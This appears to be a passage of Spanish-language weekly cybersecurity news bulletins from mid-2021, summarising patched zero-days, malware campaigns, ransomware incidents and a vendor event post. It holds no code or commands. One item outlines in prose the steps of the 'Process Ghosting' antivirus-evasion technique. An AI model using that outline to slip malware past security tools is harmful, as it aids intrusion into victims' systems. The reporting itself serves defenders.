https://www.trendmicro.com/en_us/research/21/f/bash-ransomware-darkradiation-targets-red-hat--and-debian-based-linux-distributions.html
25 de junio de 2021
Boletín semanal de ciberseguridad 12-18 de junio
Vulnerabilidad zero-day en Chrome, la séptima en lo que va de año Ayer, 17 de junio, Google presentaba la versión 91.0.4472.114 de Chrome para Windows, Mac y Linux, solventando una vulnerabilidad de tipo zero-day catalogada como CVE-2021-30554. La explotación de este fallo, podría suponer la ejecución de código arbitrario en sistemas que presenten versiones no seguras de Chrome. Por su parte, Google no ha divulgado más información sobre el problema de seguridad a la espera de que la mayor parte de los usuarios actualicen su navegador. Este tipo de vulnerabilidades de zero-day han sido últimamente explotadas por el agente amenaza PuzzleMaker con la finalidad de excederse del marco del navegador e instalar así malware en sistemas Windows. Adicionalmente, la actualización ha abordado otras tres vulnerabilidades graves del navegador, que afectaban a los componentes de Chrome Sharing, WebAudio y TabGroups, y que se han identificado como CVE-2021-30555, CVE-2021-30556 y CVE-2021-30557. https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html Vulnerabilidades 0-day en Apple Apple ha emitido actualizaciones de seguridad para abordar dos vulnerabilidades 0-day que afectan a su sistema operativo móvil iOS 12. Los fallos corregidos, catalogados como CVE-2021-30761 y CVE-2021-30762, se deben a problemas en el motor del navegador WebKit y podrían permitir a un atacante ejecutar código arbitrario a la hora de procesar un contenido web malicioso especialmente diseñado. Desde la firma se advierte que estas vulnerabilidades estarían siendo activamente explotadas. Por otro lado, en esta actualización de seguridad también se ha abordado un problema de corrupción de memoria en el decodificador ASN.1, catalogado como CVE-2021-30737, que permitiría la ejecución remota de código. Los dispositivos afectados por estos fallos son iPhone 5s, el iPhone 6, el iPhone 6 Plus, el iPad Air, el iPad mini 2, el iPad mini 3 y el iPod touch (6ª generación), todos ellos parcheados con la versión 12.5.4 de iOS. https://support.apple.com/en-us/HT212548 Microsoft detiene una operación BEC de alto impacto El equipo de investigación de Microsoft 365 Defender en conjunto con el Centro de Inteligencia de amenazas de Microsoft (MSTIC) han descubierto e interrumpido la infraestructura de una operación BEC a gran escala. En su análisis, exponen que los actores maliciosos estaban abusando de diversos servicios web alojados en la nube para comprometer buzones de correo electrónico y añadir reglas de reenvío utilizando diferentes IPs, y añadiendo latencia de tiempo entre acciones para no ser detectados por los sistemas de seguridad. Para conseguir el acceso inicial al host de la víctima habrían hecho uso de credenciales exfiltradas conseguidas mediante técnicas de ingeniería social, enviando correos de phishing donde adjuntarían un HTML que contendría un JavaScript, para simular ser un inicio de sesión de Microsoft. Una vez comprometidas las credenciales del usuario, accederían a su buzón y añadían reglas de reenvío con parámetros como “factura”, “pago” o “declaración”, lo que les permitía acceder a información financiera, además de tener un canal de exfiltración de información persistente. Asimismo, habrían creado reglas para eliminar los correos que eran reenviados a su infraestructura, añadiendo complejidad en la detección de sus operaciones. https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/ Nueva técnica de evasión de malware Investigadores de seguridad de Elastic han hecho pública una nueva técnica de manipulación de imágenes ejecutables, apodada "Process Ghosting", la cual podría ser usada por atacantes para evadir protecciones y ejecutar código malicioso de manera sigilosa en Windows. Con esta nueva técnica, un agente amenaza podría insertar un componente de malware en el disco del equipo víctima de manera que se dificulte su detección. Dicha evasión se aprovecha del lapso desde la creación de un proceso hasta que los sistemas de seguridad del dispositivo son notificados de su creación, dando a los atacantes un margen para eludir la detección. El flujo del ataque Process Ghosting comenzaría por crear un archivo, cambiar el estado del mismo a "delete-pending", pendiente de borrado, evitando así el acceso y lectura de este, posteriormente, asignaría una imagen para el archivo en el disco tras insertar el código malicioso para, finalmente, borrarlo. El siguiente paso sería crear un proceso con las variables de entorno pertinentes, a los que llamará un hilo para su ejecución. Cabe destacar que el éxito de este ataque viene dado por el hecho de que las llamadas de los sistemas de seguridad, como el antivirus, se efectúan cuando se crea el hilo, que intentarán leer un fichero ya borrado y, de esta forma, se da por eludida la seguridad. https://www.elastic.co/es/blog/process-ghosting-a-new-executable-image-tampering-attack Ataque a la cadena de suministro de un proveedor de CCTV El equipo de Mandiant de FireEye ha publicado una investigación acerca de un nuevo ataque a la cadena de suministro. Los atacantes de este incidente, que han sido identificados como UNC2465, un grupo afiliado al ransomware DarkSide, habrían vulnerado un sitio web legítimo de un proveedor de cámaras de circuito cerrado de televisión (CCTV), y habrían implantado un troyano dentro de un instalador PVR de cámara de seguridad que los usuarios descargaban para configurar y controlar sus dispositivos de seguridad. Con la instalación del software malicioso también se iniciaba la descarga del troyano Smokedham o Beacon, entre otros. Los investigadores no detectaron la presencia del ransomware Darkside en las redes de las víctimas debido, principalmente, a que esta intrusión tuvo lugar entre el 18 de mayo y principios del mes de junio, y para ese momento, Darkside ya había anunciado el cierre de su actividad tras el ataque a Colonial Pipeline. https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html Vulnerabilidad crítica en la cadena de suministro de ThroughTek La Agencia de Ciberseguridad y Seguridad de las Infraestructuras de Estados Unidos (CISA) ha emitido un aviso en relación a un fallo crítico en la cadena de suministro de software que afecta al kit de desarrollo de software (SDK) de ThroughTek. La explotación exitosa de esta vulnerabilidad podría permitir el acceso no autorizado a información sensible, como los flujos de audio/vídeo de las cámaras de seguridad. El fallo, catalogado como CVE-2021-32934 y con una puntuación CVSS de 9,1, afecta a los productos P2P de ThroughTek con versiones 3.1.5 y anteriores, así como a las versiones con la etiqueta nossl y diversas configuraciones de firmware. https://us-cert.cisa.gov/ics/advisories/icsa-21-166-01
18 de junio de 2021
Telefónica Tech presenta en Advanced Factories 2021 su propuesta para el sector industrial
Los pasados 8, 9 y 10 de junio se celebró la 5ª edición del evento Advanced Factories en Barcelona, la gran cita en España sobre automatización industrial, robótica e Industria 4.0. Además, dentro del marco de #AF2021, tuvo lugar el Industry 4.0 Congress, el mayor congreso para el sur de Europa y sobre todo a nivel nacional, en el que se descubrieron las últimas tendencias para el sector industrial y casos de éxito en la digitalización de estas compañías. Este año, Telefónica Tech fue patrocinador oficial del evento y estuvimos presentes en la agenda del congreso para presentar nuestras capacidades tecnológicas en Ciberseguridad, Cloud, IoT&Big Data y Blockchain y cómo aportamos a la Industria 4.0 gracias a nuestra potente propuesta de valor, junto a otros participantes clave como Schneider Electric, Siemens, Omron o HP. En el post que lanzábamos la semana pasada, nuestro compañero Andrés Escribano nos trasladaba cuál era la evolución definitiva hacia la digitalización de la industria y repasábamos las temáticas más importantes que se abordaría en la feria. Durante el congreso, los expertos de Telefónica Tech hablaron en sus intervenciones acerca de la altísima rapidez con la que el sector se está transformando, lo que hace que incluso ya empecemos a hablar de Industria 5.0. Las razones de esta nueva industria son principalmente dos: Las empresas requieren la fabricación de productos digitales, con una alta personalización, simplicidad y tiempos de delivery muy cortos El efecto COVID ha acelerado la adopción de la Industria 5.0 en cuanto a: Automatización de procesos Operaciones remotas para minimizar los impactos Líneas de producción ágiles y flexibles que soporten picos y valles y que se adapten de manera eficiente a los cambios en la demanda de los consumidores Esta situación, vista también como tendencia, hace que sea muy importante que socios tecnológicos con las características de Telefónica Tech acompañen a los clientes del sector. “Creemos que solo el 10% de los sensores de la Industria están conectados, por lo que la oportunidad es enorme”. Gonzalo Martín-Villa, CEO Telefónica Tech IoT & Big Data Para poder competir en la nueva Industria, son cruciales habilitadores como IoT, Big Data, Inteligencia Artificial, Ciberseguridad, Cloud… En todos ellos, Telefónica Tech tiene importantes capacidades propias que adaptamos a las necesidades del cliente y que, junto con las de un ecosistema de compañías con conocimiento específico de los procesos industriales, nos permiten ofrecer soluciones e2e al sector. “Si estás en el sector de la Industria tienes que estar ya desarrollando proyectos para digitalizar procesos, porque va a ser el diferencial que te permita competir”. Agustín Cárdenas, director Transformación Negocios Empresas Telefónica En este vídeo, los expertos que participaron en Advanced Factories 2021 nos cuentan hacia dónde está yendo el sector y por qué la oferta de Telefónica Tech es única en el mercado: https://www.youtube.com/watch?v=1wHhOOHis0k
17 de junio de 2021
Boletín semanal de ciberseguridad 5-11 de junio
Boletín mensual de Microsoft Microsoft ha lanzado su boletín de seguridad correspondiente al mes de junio en el que se corrigen 50 vulnerabilidades, entre las que se incluyen fallos de ejecución remota de código (RCE), problemas de denegación de servicio, escalada de privilegios y problemas de corrupción de memoria. Cinco de las vulnerabilidades corregidas permitirían la ejecución remota de código: CVE-2021-33742 (0-day que estaba en explotación activa), CVE-2021-31963, CVE-2021-31967, CVE-2021-31959, CVE-2021-31985. Asimismo, es destacable entre las actualizaciones de seguridad, que se incluyen parches para siete 0-days, seis de los cuales estaban siendo explotados de forma activa: CVE-2021-33742 (CVSS 7.5): vulnerabilidad de ejecución remota de código de la plataforma Windows MSHTML. CVE-2021-33739 (CVSS 8.4): vulnerabilidad de elevación de privilegios de biblioteca principal DWM de Microsoft. CVE-2021-31199 y CVE-2021-31201 (CVSS 5.2): vulnerabilidades de elevación de privilegios del proveedor criptográfico mejorado de Microsoft. CVE-2021-31955 (CVSS 5.5): vulnerabilidad de divulgación de información del kernel de Windows. CVE-2021-31956 (CVSS 7.8): vulnerabilidad de elevación de privilegios de Windows NTFS. CVE-2021-31968 (CVSS 7.5): vulnerabilidad de denegación de servicio en Windows Remote Desktop Services. Se trata del único 0-day corregido para el que no se tienen evidencias de su explotación. Información completa: https://msrc.microsoft.com/update-guide/en-us Nueva campaña de PuzzleMaker utiliza una cadena de 0-days en Chrome y Windows 10 Investigadores han descubierto un nuevo grupo denominado PuzzleMaker, que estaría utilizando una cadena de 0-days en Google Chrome y Windows 10 en ataques altamente dirigidos contra empresas de todo el mundo. La campaña estaría activa desde mediados de abril, cuando se comprometieron los sistemas de las primeras víctimas. La cadena de exploits de 0-days desplegada en esta actividad aprovecha una vulnerabilidad de ejecución remota de código en Google Chrome V8 Javascript para acceder al sistema. A continuación, los atacantes utilizaban un exploit de escalada de privilegios para comprometer las últimas versiones de Windows 10, aprovechando una vulnerabilidad en Windows kernel (CVE-2021-31955) y otro fallo de escalada de privilegios de Windows NTFS (CVE-2021-31956), ambos ya parcheados. Una vez utilizados los exploits de Chrome y Windows para conseguir un punto de acceso al sistema de la víctima, PuzzleMaker despliega y ejecuta cuatro módulos adicionales de malware desde un servidor remoto. En primer lugar, se despliega un stager para notificar que la explotación fue satisfactoria, así como para desplegar y ejecutar un dropper más complejo, que a su vez instala dos ejecutables, que simulan ser archivos legítimos del sistema operativo de Windows; el segundo de ellos es una Shell remota y puede ser considerada como el payload principal de estos ataques. No se han identificado similitudes entre el malware utilizado y otros ya conocidos. Más detalles: https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/ Boletín de Chrome – Nuevo 0-day activamente explotado Google ha publicado su boletín mensual correspondiente al mes de junio en el que se han corregido varios fallos de seguridad en su navegador Chrome para Windows, Mac y Linux. Entre estos fallos se encuentra un nuevo 0-day de severidad alta, identificado como CVE-2021-30551 que, según indica la propia compañía, estaría siendo explotado de forma activa. Por su parte, el empleado de Google, Shane Huntley, ha publicado un tweet en el que confirma que este exploit estaría siendo utilizado por el mismo grupo al que se ha relacionado con el aprovechamiento del 0-day CVE-2021-33742 en el navegador Edge corregido por Microsoft esta semana. Este nuevo 0-day viene derivado de un error de confusión de tipos en su motor de código abierto V8 y permite a un atacante remoto, mediante una página web especialmente diseñada, engañar al usuario para que este acceda y lograr así explotar este fallo y ejecutar código arbitrario en el sistema de la víctima. Por otro lado, cabe destacar también del nuevo boletín, una vulnerabilidad crítica de tipo use-after-free en el sistema de optimización BFCache (CVE-2021-30544). Toda la info: https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html Nuevos grupos aprovechan vulnerabilidades antiguas de SonicWall VPN El equipo de respuesta a incidentes de CrowdStrike ha identificado que operadores de ransomware estaría aprovechando una vulnerabilidad antigua en SonicWall VPN (CVE-2019-7481 CVSS 7.5) que afecta dispositivos Secure Remote Access SRA 4600 en diversos incidentes. La capacidad de aprovechar esta vulnerabilidad contra dispositivos SRA no había sido previamente reportada, y estaría afectando a las versiones anteriores a las 10.x, pese a que oficialmente se publicó que solo afectaba a versiones anteriores a la 9.0.0.3, puesto que en las últimas versiones del firmware Secure Mobile Access (SMA) ya no mitigan este CVE para los dispositivos SRA. Asimismo, en febrero de 2021, el PSIRT de SonicWall desglosó un nuevo 0-day (CVE-2021-20016 CVSS 9.8) que afectaba a sus dispositivos SMA 100 y que requería actualizaciones a versiones posteriores a la 10.x. Respecto a esta vulnerabilidad, SonicWall no mencionó si afectaba a los antiguos dispositivos SRA VPN que todavía estaban en entornos de producción, ya que se consideran fuera de su vida útil. Este análisis de CrowdStrike se ha centrado en la vulnerabilidad de 2019 ya que existen pruebas de concepto públicas de la misma y afirman no querer facilitar información que pudiera ser utilizada por atacantes, ya que la vulnerabilidad de 2021 no tiene PoCs públicas en estos momentos. Para saber más: https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/ Siloscape: el primer malware dirigido a contenedores Windows El investigador de PaloAlto Daniel Prizmant ha detallado la primera campaña de malware dirigida a contenedores Windows. En julio de 2020 se hizo pública una técnica para escapar contenedores de Windows en Kubernetes y acceder al cluster de éstos, aunque al principio Microsoft no la reconoció como una vulnerabilidad ya que argüían que los contenedores no deberían ser usados como una medida de seguridad, finalmente tuvieron que reconocer el fallo al permitir éste escapar de un contenedor al host sin contar con permisos de administrador (CVE-2021-24096). El nuevo malware denominado "Siloscape" pretende explotar Kubernetes a través de contenedores Windows, implantando una puerta trasera en clusters de Kubernetes mal configurados para así ejecutar contenedores maliciosos con funcionalidades de minado de criptomonedas o exfiltrar información de las aplicaciones ejecutándose en el cluster. Los vectores de ataque inicial en los contenedores han sido principalmente vulnerabilidades web como CVE-2020-14882, aplicaciones PHP vulnerables, inyecciones SQL, o servicios Redis vulnerables. Más información: https://unit42.paloaltonetworks.com/siloscape/
11 de junio de 2021
Boletín semanal de ciberseguridad 29 de mayo-4 de junio
Vulnerabilidad en SonicWall Network Security Manager SonicWall ha publicado parches de seguridad para corregir una vulnerabilidad que afectaría a las versiones locales de la solución de gestión del firewall multiusuario Network Security Manager (NSM). Catalogada como CVE-2021-20026 y con un CVSS de 8’8, este error podría ser explotado de forma sencilla sin la interacción del usuario, aunque, como factor mitigante, cabe señalar que es necesario encontrarse autenticado en el sistema para conseguir su explotación. Afecta a NSM 2.2.0-R10-H1 y versiones anteriores, pero no a las ya corregidas versiones 2.2.1-R6 y 2.2.1-R6 (Enhanced) de NSM. Asimismo, esta vulnerabilidad solo afectaría a los despliegues de NSM en las instalaciones, no viéndose afectadas las versiones SaaS. Si bien la compañía no ha indicado que exista un peligro inmediato de que los atacantes exploten esta vulnerabilidad, SonicWall estaría instando a los clientes a que corrijan este fallo de inmediato. Para saber más: https://www.sonicwall.com/support/product-notification/security-advisory-on-prem-sonicwall-network-security-manager-nsm-command-injection-vulnerability/210525121534120/ Análisis del malware utilizado por el actor amenaza Nobelium Microsoft ha publicado un análisis de los artefactos utilizados en la etapa inicial de la campaña de suplantación a la Agencia Americana para el Desarrollo Internacional (USAID) del actor amenaza Nobelium, también conocido como APT29 y que estaría tras el ataque de cadena de suministro de SolarWinds. En concreto, se han identificado 4 nuevas familias de malware: EnvyScout: permite el robo de credenciales NTLM de las cuentas de Windows y coloca una imagen ISO maliciosa en el equipo vulnerado. Este malware habría sido identificado también en una campaña de suplantación a la Embajada de Bélgica. Boombox: archivo .exe incluido en la ISO que actúa como downloader descargando los artefactos maliciosos cifrados desde Dropbox. También es capaz de recopilar información sobre el dominio de Windows para remitirla cifrada a un servidor remoto. NativeZone: DLL que actúa como loader y se inicia automáticamente cuando un usuario inicia sesión en Windows con el fin de lanzar CertPKIProvider.dll (VaporRage). VaporRage: DLLque cuenta con capacidades de descarga y ejecución de shellcode desde los servidores C2 y con las que los atacantes realizan diferentes actividades maliciosas, entre las que se incluye la instalación de balizas de Cobalt Strike. Más información: https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ Explotación activa de un 0-day en el plugin Fancy Product Designer Se ha detectado una campaña de explotación activa de una vulnerabilidad 0-day en el plugin Fancy Product Designer de WordPress, un plugin que estaría presente en más de 17 mil páginas web y que permite personalizar la visualización de productos en WordPress, WooCommerce y Shopify. Se trata de una vulnerabilidad de ejecución remota de código y de carga de archivos arbitrarios que no requiere autenticación del usuario. Este fallo ha sido identificado como CVE-2021-24370 (CVSSv3 de 9.8) y afecta la versión 4.6.8 y anteriores del plugin en plataformas WordPress, WooComerce y Shopify. Sin embargo, los investigadores exponen que es probable que los ataques se bloqueen en plataformas Shopify puesto que cuentan con controles de acceso más estrictos. Se recomienda la desinstalación completa del plugin hasta que se disponga de un parche, puesto que, en algunas ocasiones, es posible aprovechar esta vulnerabilidad incluso si el plugin está desactivado. Más detalles: https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/ Distribución de Teabot y Flubot a través de aplicaciones y webs fraudulentas Desde diciembre de 2020, se han registrado diversos ataques contra dispositivos Android con las familias de malware Teabot y Flubot. Recientemente, investigadores de Bitdefender han identificado una nueva oleada de aplicaciones que distribuyen estos troyanos bancarios tratando de imitar las aplicaciones legítimas mejor calificadas en el store de Android. Por su parte, Teabot cuenta con la capacidad de llevar a cabo ataques de superposición a través de los servicios de accesibilidad de Android, interceptar mensajes, realizar varias actividades de registro de teclas, robar códigos de autenticación de Google e incluso tomar el control remoto total de los dispositivos afectados. Hasta el momento está dirigido contra diversas entidades bancarias conocidas como Bankia, BBVA, Banco Santander o ING España, entre otras. Por otra parte, Flubot ha tenido un importante impacto en Alemania, España, Italia y Reino Unido. El vector de entrada de este troyano bancario sigue siendo mensajes SMS que tratan de suplantar a compañías de paquetería como son DHL, FedEx o Correos. Flubot cuenta con la capacidad de robar datos bancarios, contactos, SMS y otros datos privados. Asimismo, es capaz de ejecutar otros comandos disponibles, incluyendo el envío de SMS con el contenido que le proporcione el servidor C2. Toda la info: https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/ Epsilon Red: nuevo ransomware explotando vulnerabilidades Proxylogon de Microsoft Exchange El equipo de investigadores de Sophos ha descubierto un nuevo ransomware, denominado Epsilon Red, tras la investigación de un ataque a una importante empresa estadounidense del sector hotelero sin identificar. Según los investigadores, el vector de entrada utilizado por agentes amenaza habría consistido en la explotación de vulnerabilidades Proxylogon, debido a que la compañía no habría aplicado los parches de seguridad para proteger la infraestructura IT, en lo referido a sus servidores de Microsoft Exchange. Después de conseguir el compromiso de la red, los actores maliciosos acceden a través de RDP y usan Windows Management Instrumentation (WMI) para ejecutar software y scripts de PowerShell para finalmente desplegar el ransomware Epsilon Red. En cuanto a las características de este nuevo software malicioso destaca que está escrito en Goland y que dispone de diferentes scripts de PowerShell cuyas funcionalidades consisten en eliminar procesos de los dispositivos de las víctimas o deshabilitar soluciones de seguridad, entre otras. Si bien el origen de esta amenaza se desconoce y que el nombre, junto con el empleo de esta herramienta, son exclusivos de este atacante, la nota de rescate se asemeja enormemente a la del ransomware REvil. Más: https://news.sophos.com/en-us/2021/05/28/epsilonred/
4 de junio de 2021
Boletín semanal de ciberseguridad 22-28 de mayo
Vulnerabilidad en el stack del protocolo HTTP de Windows también afecta a WinRM Investigadores de seguridad han descubierto que la vulnerabilidad que afectaba al servidor web Windows IIS (CVE-2021-31166, CVSS 9.8), que residía en el stack del protocolo HTTP -http.sys- encargado de procesar peticiones, también puede ser aprovechada para atacar sistemas que exponen el servicio WinRM (Windows Remote Management), permitiendo a atacantes no autenticados ejecutar código arbitrario. Esta vulnerabilidad únicamente afecta a las versiones 2004 y 20H2 de Windows 10 y Windows Server. Cabe destacar que mientras este servicio viene desactivado en las versiones de Windows 10, está activado por defecto en las versiones de Windows Server. A pesar de que no existe públicamente una prueba de concepto para ejecutar código arbitrario haciendo uso de esta vulnerabilidad, investigadores han publicado una prueba para realizar ataques de denegación de servicio con el envío de un único paquete. Para saber más: https://www.bleepingcomputer.com/news/security/wormable-windows-http-vulnerability-also-affects-winrm-servers/ Vulnerabilidad zero-day en Apple Apple ha publicado un boletín de seguridad donde corrige múltiples fallos de seguridad, entre ellos uno de tipo zero-day, que afectan a su sistema operativo de escritorio macOS. Entre las vulnerabilidades abordadas, destaca la zero-day, descubierta por la firma de seguridad Jamf y catalogada como CVE-2021-30713, que hace referencia a un fallo de bypass en el framework de TCC de macOS y que estaría siendo explotada desde hace al menos un año por el grupo que opera el malware XCSSET. Para la distribución de la muestra, los operadores de XCSSET ocultarían el código malicioso en proyectos Xcode de Github, simulando ser scripts legítimos de Apple para conseguir eludir el control de transparencia y control (TCC) de macOS. Asimismo, cabe destacar otra vulnerabilidad corregida, descubierta por el equipo de investigadores de ZecOps e identificada como CVE-2021-30741, cuyo impacto afecta a sistemas iOS permitiendo el procesamiento de código malicioso. Desde Apple se recomienda la actualización de los sistemas afectados a las últimas versiones para solucionar los problemas de seguridad. Toda la información: https://support.apple.com/en-us/HT201222 Actualización: nueva campaña de espionaje basada en la explotación de vulnerabilidades en Pulse Secure El pasado 20 de abril investigadores de FireEye publicaban el descubrimiento y análisis de una campaña de espionaje a través de la explotación de vulnerabilidades en dispositivos Pulse Secure VPN, llevada a cabo por presuntos actores amenaza de origen chino. Actualmente, un mes más tarde, los investigadores han seguido recopilando información de sus hallazgos. El equipo de ingeniería inversa de Flare ha identificado 4 nuevas familias de malware relacionadas con UNC2630, diseñadas específicamente para manipular dispositivos Pulse Secure, denominadas BLOODMINE, BLOODBANK, CLEANPULSE y RAPIDPULSE. Asimismo, la CISA ha actualizado su alerta para incluir nuevas TTPs de los actores amenaza, IoCs y medidas de mitigación actualizadas. Por su parte, el equipo de respuesta a incidentes de seguridad de Ivanti ha publicado una nueva herramienta para mejorar la integridad del software Pulse Connect Secure. Más detalles: https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html Campaña de malvertising con el software AnyDesk El equipo de Falcon Complete de CrowdStrike ha publicado el análisis de una campaña de malvertising que usa como señuelo el software de escritorio remoto AnyDesk. Los operadores de la campaña habrían hecho uso de la plataforma de publicidad de Google para suplantar la página web legítima de AnyDesk, apareciendo en las búsquedas antes que los anuncios del propio software legítimo. A través de la página suplantada los usuarios se descargarían el instalador de AnyDesk, el cual ha sido previamente troyanizado incluyendo funcionalidades maliciosas. Los investigadores sugieren que alrededor del 40% de los clicks en estos anuncios maliciosos de Google resultaron en instalaciones del binario troyanizado de AnyDesk, mientras que en el 20% de las instalaciones los actores amenaza realizaron comunicaciones directas con los equipos de las víctimas para asignar tareas o ejecutar comandos. Info completa: https://www.crowdstrike.com/blog/falcon-complete-disrupts-malvertising-campaign-targeting-anydesk/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
28 de mayo de 2021
Boletín semanal de ciberseguridad 15-20 de mayo
Avisos de seguridad de QNAP QNAP ha emitido dos avisos de seguridad para alertar a sus clientes acerca de: La detección de ataques recientes con el ransomware eCh0raix que estarían apuntando contra sus dispositivos NAS (Network Attached Storage). Desde la firma instan a sus clientes a protegerse de este tipo de ataques de forma inmediata mediante el uso de contraseñas más seguras, habilitando la protección de acceso a IP para evitar ataques de fuerza bruta, y, evitando el uso de puertos por defecto 443 y 8080. Esta alerta se produce tan solo unas semanas después de que investigadores de seguridad ya alertasen de la detección de ataques del ransomware AgeLocker (aka Qlocker) contra sus dispositivos. La explotación activa de una vulnerabilidad de 0-day en Roon Server, en concreto con afectación a los Roon Labs de Roon Server 2021-02-01 y versiones anteriores. Desde QNAP recomiendan deshabilitar el Roon Server y no exponer el NAS a internet para protegerse de estos ataques hasta que se publique una actualización de seguridad. Todos los detalles: https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/ El troyano bancario Bizarro amplía su afectación a Europa Investigadores de seguridad han identificado nuevas campañas del troyano bancario brasileño conocido como Bizarro en varios países de Europa como España, Francia, Portugal o Italia. Como viene siendo habitual en los troyanos brasileños, su distribución se realiza mediante campañas de spam que fuerzan la descarga de un archivo ZIP desde un sitio web comprometido, habiéndose identificado infraestructura en AWS, WordPress o Azure, tanto para el alojamiento de los archivos maliciosos iniciales como para el alojamiento de los C2. Se trata de un stealer que recopila información sobre el equipo infectado, la sesión, el antivirus empleado o datos del navegador. Una vez en el navegador, el software malicioso fuerza el cierre de las sesiones abiertas en servicios bancarios digitales en el navegador para obligar al usuario a volver a introducir las credenciales y así poder capturarlas. Además, cuenta con otras capacidades típicas en este tipo de troyanos como el secuestro de ratón y teclado, la resolución de factores de doble autenticación (2FA), el registro de pulsaciones, el envío de mensajes de sistema falsos, o la inducción a la instalación de aplicaciones maliciosas entre otras. Información completa: https://securelist.com/bizarro-banking-trojan-expands-its-attacks-to-europe/102258/ Cuatro vulnerabilidades de Android explotadas in the wild Android ha actualizado la información asociada a cuatro vulnerabilidades corregidas el pasado 3 de mayo en su boletín de seguridad del mes de mayo. En concreto, ha cambiado la información relacionada con su explotación y afirma que estarían podrían estar siendo explotadas. Dos de las vulnerabilidades, identificadas como CVE-2021-1905 y CVE-2021-1906, afectan a los drivers de las GPU de Qualcomm, mientras que las dos restantes, CVE-2021-28663 y CVE-2021-28664 afectan a los drivers de las GPU Arm de Mali. Según el equipo Project Zero de Google, las cuatro vulnerabilidades estaban siendo explotadas por los atacantes antes incluso de que se publicaran los parches, y podrían haber sido empleadas en ataques dirigidos. Toda la info: https://twitter.com/maddiestone/status/139500434699624 Nueva tendencia de doble cifrado con múltiples variantes de ransomware Recientemente se ha conocido una nueva tendencia, analizada por los investigadores de Emsisoft, en la que actores maliciosos estarían usando múltiples variantes de ransomware para cifrar doblemente los datos de sus víctimas, con el objetivo de complicar la posible recuperación e incrementar las posibilidades de obtener un rescate. Cabe mencionar que no se trata de una doble extorsión sino de un doble cifrado, en el que los mismos operadores, deciden utilizar diferentes variantes de ransomware en un mismo ataque. En el análisis realizado se han observado ataques usando conjuntamente REvil y Netwalker, así como otros utilizando MedusaLocker junto con GlobeImposter. En algunos casos se ha llegado a compartir una muestra a través del portal de un grupo cuando los archivos cifrados habían sido enviados a través del portal del otro, por lo que es posible incluso que los operadores de las distintas familias estén trabajando conjuntamente. También se ha observado que en ocasiones se cifran los datos primeramente con un ransomware para luego re-cifrarlos con el segundo, mientras que, en otros, parte del sistema de cifra con una variante y parte con otra. Esta nueva tendencia, se suma a otras observadas recientemente, como el método de la triple extorsión, que consistiría en, además de cifrar los datos y amenazar con hacerlos públicos, contactar con clientes o terceras partes que puedan estar afectadas por el ataque para solicitarles un rescate, con el mismo objetivo de incrementar los beneficios económicos. Más detalles: https://blog.emsisoft.com/en/38554/psa-threat-actors-now-double-encrypting-data-with-multiple-ransomware-strains/ Campaña de distribución del malware STRRAT El equipo de seguridad de Microsoft informa de la detección de una nueva campaña de distribución masiva por email de la última versión del malware STRRAT. Los atacantes, estarían haciendo uso de cuentas de correo previamente comprometidas para el envío de los mensajes, que contiene una imagen adjunta que simula ser un PDF adjunto. Al hacer clic para abrir el supuesto documento, la imagen descarga el malware STRRAT. Las primeras detecciones de esta familia se remontan a 2020. Se trata de un malware programado en Java y que cuenta con un espectro de funcionalidades diverso, desde el robo de credenciales de distintos clientes de correo, el registro las pulsaciones del teclado, la ejecución de comandos arbitrarios, o la habilidad de instalar la herramienta open source RDWrap para lograr acceso remoto mediante sesiones RDP entre otras. Cabe destacar también, la función "rw-encrypt", que únicamente añade la extensión “.crimson” a los archivos, sin modificar el contenido de estos. Es decir, el usuario podría pensar que los archivos están cifrados como ocurre en los ataques de ransomware puesto que, al haberse cambiado la extensión por “.crimson” no puede abrirlos; sin embargo, bastaría volver a poner la extensión original para poder recuperar la información. Desde Microsoft han publicado queries de búsqueda avanzadas para facilitar la identificación de indicadores y comportamiento malicioso relacionado con STRRAT. Para saber más: https://twitter.com/MsftSecIntel/status/1395138347601854465
21 de mayo de 2021
Boletín semanal de ciberseguridad 8-14 de mayo
Ataque de ransomware a uno de los oleoductos más importantes de Estados Unidos La empresa energética estadounidense Colonial Pipeline se vio afectada el pasado viernes por un ataque de ransomware, como resultado del cual unos 8800 km de oleoductos que abastecían de crudo a la costa este han tenido que ser clausurados. Esta medida habría sido tomada preventivamente para evitar la propagación del malware, pero, según indica la entidad, el ataque solo habría afectado a su red corporativa IT, y no a sistemas OT. Varias fuentes especializadas atribuyen el incidente a la familia de ransomware conocida como DarkSide, quienes ya fueron responsables del ataque a la Escuela de Organización Industrial (EOI) en España. Este ransomware se adhiere a las tendencias actuales de doble extorsión (exfiltración de datos y su publicación en abierto) y modelo de negocio mediante afiliaciones (Ransomware-as-a-Service). Tras el incidente, el gobierno estadounidense declaraba el estado de emergencia con el objetivo de trasladar el crudo necesario para la población a través de carretera. El impacto del incidente provocó que los operadores de DarkSide publicaran una nota de prensa, donde afirmaban ser apolíticos y no tener relación con ningún gobierno. Del mismo modo, indicaron que a partir de ahora revisarán sus objetivos antes de perpetrar sus ataques, dado que el objetivo de su organización es ganar dinero y no “crear problemas sociales”. DarkSide funciona como Ransomware-as-a-Service, este modelo consta de dos grupos de personas: los desarrolladores del ransomware y sus afiliados que proveen el acceso a las redes víctima. Tras el incidente a Colonial Pipeline, se espera un mayor control sobre este segundo grupo por parte de los desarrolladores de DarkSide. En relación con el ataque, se estima que los operadores del ransomware exfiltraron cerca de 100GB de datos de los sistemas antes del cifrado de la red, aunque por el momento siguen sin hacer públicos estos archivos. En las últimas horas, desde el medio Bloomberg afirman que la empresa 